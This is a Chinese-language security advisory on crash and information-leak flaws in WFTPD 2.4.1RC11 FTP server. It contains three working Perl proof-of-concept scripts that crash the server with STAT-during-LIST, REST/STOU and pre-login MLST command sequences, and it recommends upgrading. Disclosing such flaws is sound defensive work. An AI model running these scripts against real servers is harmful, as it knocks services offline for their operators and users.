|
WFTPD 2.4.1RC11存在多个安全漏洞
受影响的系统:
Texas Imperial Software WFTPD 2.4.1RC11
Texas Imperial Software WFTPD 2.4.1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
Texas Imperial Software WFTPD 2.40
Texas Imperial Software WFTPD 2.34
- Microsoft Windows 3.x
- Microsoft Windows 9x
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5
不受影响系统:
Texas Imperial Software WFTPD 2.4.1RC12
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
--------------------------------------------------------------------------------
WFTPD 2.4.1RC11以及更老的版本存在多个安全漏洞.
1) 当LIST命令正在处理时再提交一个STAT命令将导致ftp server崩溃
2) 当REST命令用来往文件的结尾写入的时候,或者是试图往一个不存在的文件写入时,
也会导致ftp server崩溃
3) 当一个文件正在传输中的时候,执行STAT命令将泄漏文件的文件名和路径
4) 在没有登录进ftp server之前就执行MLIST命令将导致ftp server崩溃
<* 来源:Blue Panda *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
========================== wftpdstat.pl BEGIN ==============================
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends STAT without waiting for LIST to finish, which will cause the server
# to crash.
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Issue a LIST command, then STAT. If the STAT arrives before the LISTing
# is finished, the server will crash.
print $socket "USER $user\nPASS $pass\nLIST\nSTAT\n";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
sleep(1);
print ".";
$time += 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
========================== wftpdstat.pl END ==============================
========================== wftpdrest.pl BEGIN ==============================
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
print $socket "USER $user\nPASS $pass\nREST 1\nSTOU\n";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
sleep(1);
print ".";
$time += 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
========================== wftpdrest.pl END ==============================
========================== wftpdmlst.pl BEGIN ==============================
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #3
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends an MLST command without logging in with USER and PASS first, causing
# WFTPD to crash. Note: MLST is not enabled by default, and must be for this
# to work.
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$wait = 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
print $socket "MLST a\n";
# Wait a while, just to make sure the command arrives.
print "Waiting...";
$time = 0;
while ($time < $wait) {
sleep(1);
print ".";
$time += 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
========================== wftpdmlst.pl END ==============================
--------------------------------------------------------------------------------
建议:
升级到WFTPD 2.4.1RC12:
http://www.wftpd.com/
(,2000-11-01)
|
